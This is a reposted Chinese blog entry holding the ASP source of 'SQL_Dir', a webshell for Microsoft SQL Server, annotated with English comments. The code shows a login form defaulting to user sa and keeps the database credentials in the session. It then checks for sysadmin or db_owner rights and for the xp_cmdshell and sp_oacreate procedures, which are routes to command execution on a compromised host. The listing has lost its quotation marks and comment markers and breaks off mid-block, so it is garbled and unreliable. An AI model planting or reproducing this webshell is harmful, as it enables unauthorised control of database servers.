mssql操作用webshell--sql_dir.asp

2018-09-06 12:31


  摘自:WowoS Blog

  <!-- Page head for the SQL_Dir console: document title plus an inline stylesheet (id=theStyle).
       Presentation only; all server-side logic lives in the <% %> blocks that follow. -->
  <title>SQL_Dir By Bin</title>
<style id=theStyle>
/* Base typography and colour scheme. The scrollbar-* properties are IE-only extensions
   and are ignored by other browsers. */
BODY {
FONT-SIZE: 9pt;
COLOR: #000000;
background-color: #ffffff;
FONT-FAMILY: Courier New;
scrollbar-face-color:#E4E4F3;
scrollbar-highlight-color:#FFFFFF;
scrollbar-3dlight-color:#E4E4F3;
scrollbar-darkshadow-color:#9C9CD3;
scrollbar-shadow-color:#E4E4F3;
scrollbar-arrow-color:#4444B3;
scrollbar-track-color:#EFEFEF;
}
/* Result tables: collapsed borders, top/left edges on the table, right/bottom edges on cells (see td). */
TABLE {
FONT-SIZE: 9pt;
FONT-FAMILY: Courier New;
BORDER-COLLAPSE: collapse;
border-width: 1px;
border-top-style: solid;
border-right-style: none;
border-bottom-style: none;
border-left-style: solid;
border-color: #d8d8f0;
}
.tr {
font-family: Courier New;
font-size: 9pt;
background-color: #e4e4f3;
text-align: center;
}
.td {
height: 24px;
font-size: 9pt;
background-color: #f9f9fd;
font-family: Courier New;
}
input {
font-family: Courier New;
BORDER-TOP-WIDTH: 1px;
BORDER-LEFT-WIDTH: 1px;
FONT-SIZE: 12px;
BORDER-BOTTOM-WIDTH: 1px;
BORDER-RIGHT-WIDTH: 1px;
color: #000000;
}
textarea {
font-family: Courier New;
BORDER-WIDTH: 1px;
FONT-SIZE: 12px;
color: #000000;
}
A:visited {
FONT-SIZE: 9pt;
COLOR: #333333;
FONT-FAMILY: Courier New;
TEXT-DECORATION: none;
}
A:active {
FONT-SIZE: 9pt;
COLOR: #3366cc;
FONT-FAMILY: Courier New;
TEXT-DECORATION: none;
}
A:link {
FONT-SIZE: 9pt;
COLOR: #000000;
FONT-FAMILY: Courier New;
TEXT-DECORATION: none;
}
A:hover {
FONT-SIZE: 9pt;
COLOR: #3366cc;
FONT-FAMILY: Courier New;
TEXT-DECORATION: none;
}
tr {
font-family: Courier New;
font-size: 9pt;
line-height: 18px;
}
td {
font-size: 9pt;
font-family: Courier New;
border-width: 1px;
border-top-style: none;
border-right-style: solid;
border-bottom-style: solid;
border-left-style: none;
border-color: #d8d8f0;
}
.trHead {
font-family: Courier New;
height: 2px;
background-color: #e4e4f3;
line-height: 2px;
}

  /* Single-line cell content, clipped with an ellipsis instead of wrapping. */
  .fixSpan {
overflow: hidden;
white-space: nowrap;
text-overflow: ellipsis;
vertical-align: baseline;
}

  .fixTable {
word-break: break-all;
word-wrap: break-word;
}

  /* Entries in the #fileList container; fixed width, clipped text. */
  #fileList span{
width: 120px;
line-height: 23px;
/* cursor: hand is an IE-only value; the standard equivalent is cursor: pointer. */
cursor: hand;
overflow: hidden;
padding-left: 5px;
white-space: nowrap;
text-overflow: ellipsis;
vertical-align: baseline;
border: 1px solid #ffffff;
}
</style>
<%if session(login)= then%>
<%
' Login form, rendered only while the session holds no login flag. The comparison on the
' line above reads as session("login") = "" with its quotation marks missing: this listing
' has lost its quote characters throughout, so string literals and the arguments to Echo
' appear bare and the code is not runnable as printed.
' The form POSTs ip/port/user/pass to ?action=login, which the next script block handles.
' Defaults are localhost, port 1433 and user sa; the PASS field is declared type=text, so
' the typed password is displayed in clear rather than masked.
' Echo is a Sub defined further down the page; classic ASP makes procedures available
' page-wide regardless of where they are declared.
' For anyone scanning web content: an .asp page carrying a form with these defaults is a
' straightforward artefact to match on.
Echo <body onload=document.formx.pass.focus();>
Echo <table width=816 align=center>
Echo <form method=post name=formx action=?action=login>
Echo <tr>
Echo <td align=center class=td>数 据 库 连 接</td>
Echo </tr>
Echo <tr>
Echo <td height=75 align=center>
Echo IP:<input name=ip type=text style=border:1px solid #d8d8f0;background-color:#ffffff; value=localhost>
Echo PORT:<input name=port type=text style=border:1px solid #d8d8f0;background-color:#ffffff; value=1433>
Echo USER:<input name=user type=text style=border:1px solid #d8d8f0;background-color:#ffffff; value=sa>
Echo PASS:<input name=pass type=text style=border:1px solid #d8d8f0;background-color:#ffffff;>
Echo </td>
Echo </tr>
Echo <tr>
Echo <td align=center class=td><input type=submit value=LOGIN style=border:1px solid #d8d8f0;background-color:#f9f9fd;></td>
Echo </tr>
Echo <tr>
Echo <td align=center class=td>2007 @ SQL_DIR By Bin <br><a href=
Echo </tr>
Echo </form>
Echo </table>
Echo </body>

  %>

  
<%End If %>
<%
' Login handler: runs when the form above is posted with action=login.
' The trailing Chinese text on several lines below is the author's inline comment whose
' leading apostrophe was lost in publication (as were the quotation marks):
'   连接IP [ 本地用 (local) 外地用IP ]  = "connection IP [ use (local) locally, an IP address remotely ]"
'   用户名 = "username"      用户密码 = "user password"
'   sql数据库名 = "SQL database name"      容错 = "error tolerance"
If request(action)=login Then
' ip/port/user/pass come straight from the POST body with no validation and are spliced
' into the OLE DB connection string (Provider=Sqloledb; User ID / Password /
' Initial Catalog / Data Source).
SqlLocalName =request.Form(ip),request.Form(port) 连接IP [ 本地用 (local) 外地用IP ]
SqlUserName =request.Form(user) 用户名
SqlPassword =request.Form(pass) 用户密码
SqlDatabaseName=sql数据库名
ConnStr = Provider=Sqloledb;User ID= SqlUserName ; Password= SqlPassword ; Initial CataLog = SqlDatabaseName ; Data Source= SqlLocalName ;
' Appears to be the T-SQL GetDate() text held as a string; it is not referenced in this block.
SqlNowString=GetDate()
' On Error Resume Next silences every failure below, so the Err.number checks are the only
' error handling. Note that Conn is not created in this block (no Server.CreateObject here;
' the tools block further down creates its own), so unless it is created earlier in the
' page the Open call fails quietly and the redirect at the end still runs.
On Error Resume Next 容错
Conn.open ConnStr
' Two OLE DB error codes are mapped to browser alerts. The alert text reads
' "host IP or port connection error, please check!" and
' "username or password error, please check!" respectively.
If Err.number=-2147467259 Then
Echo <script language=javascript> alert(主机IP或者端口连接错误,请检查!);history.back(); </script>
ElseIf Err.number=-2147217843 Then
Echo <script language=javascript> alert(用户名或者密码错误,请检查!);history.back(); </script>
End If
' On a clean connect the session keeps a login flag plus the raw database credentials
' (user, pass, ip, port); the tools block re-reads them to rebuild its connection string.
' From a defender's view, this POST to ?action=login and the session state it leaves
' behind are the server-side artefacts of the tool.
If Err.number=0 Then
session(login)=yes
session(user)=request.Form(user)
session(pass)=request.Form(pass)
session(ip)=request.Form(ip)
session(port)=request.Form(port)
End If
' Unconditional redirect to the tools view, whether or not the connect succeeded.
response.redirect?action=tools
End If
%>

  <%

  
If request(action)=tools or request(action)= Then

  If session(login)=yes Then
%>
<%
rem----------------------------数据库连接-----------------
ConnStr = Provider=Sqloledb.1;User ID= session(user) ; Password= session(pass) ; Initial CataLog = SqlDatabaseName ; Data Source= session(ip) ,session(port);
Set Conn=Server.CreateObject(ADODB.Connection)
Conn.open ConnStr
Set Cat = Server.CreateObject(ADOX.Catalog)
Cat.ActiveConnection = conn.ConnectionString
rem------------------------函数-------------
Sub Echo(sStr)
  ' Emit sStr into the HTTP response body exactly as given; no encoding or escaping is applied.
  Call Response.Write(sStr)
End Sub

  Function IIf(var, val1, val2)
    ' Inline conditional: yields val1 when var compares equal to True, otherwise val2.
    ' Both val1 and val2 are evaluated by the caller before the call, so there is no
    ' short-circuiting of either branch.
    If var = True Then
      IIf = val1
    Else
      IIf = val2
    End If
  End Function
const copyright = Code By Bin<br><a href =
RootPath = Server.MapPath(/)
Path=Request.ServerVariables(PATH_TRANSLATED)
Server_Name=Request.ServerVariables(SERVER_NAME)
IP=Request.ServerVariables(LOCAL_ADDR)
PORT=Request.ServerVariables(SERVER_PORT)
OS= Request.ServerVariables(OS)
OS= IIf(OS = , Windows2003, OS) , Request.ServerVariables(SERVER_SOFTWARE)
OS= OS , ScriptEngine / ScriptEngineMajorVersion . ScriptEngineMinorVersion . ScriptEngineBuildVersion
Curl=Request.ServerVariables(SCRIPT_NAME)
RequestUrl=Request.ServerVariables(Url)
URL=

  rem--------------------------------------

  
rem-----------------------数据库操作--------------------
Set rs = conn.execute(select @@version)
SQLversion=rs(0)
Set rs = Conn.execute(select db_name(0))
DBname=rs(0)
Set rs = Conn.execute(select user)
DBuser=rs(0)
权限判断
Set rs = Conn.execute(Select IS_SRVROLEMEMBER(sysadmin))
If rs(0)=1 Then
dbo=sa
End If
Set rs = Conn.execute(Select IS_MEMBER(db_owner))
If rs(0)=1 Then
dbo=db_owner
Else
dbo=public
End If
扩展判断
Set rs = Conn.execute(select count(*) from master.dbo.sysobjects where xtype=X and name=xp_cmdshell)
If rs(0)=1 Then
xp_cmdshell=XP_cmdshell √
Else
xp_cmdshell=XP_cmdshell ×
End If
Set rs = Conn.execute(select count(*) from master.dbo.sysobjects where xtype=X and name=sp_oacreate)
If rs(0)=1 Then
sp_oacreate=SP_oacreate √

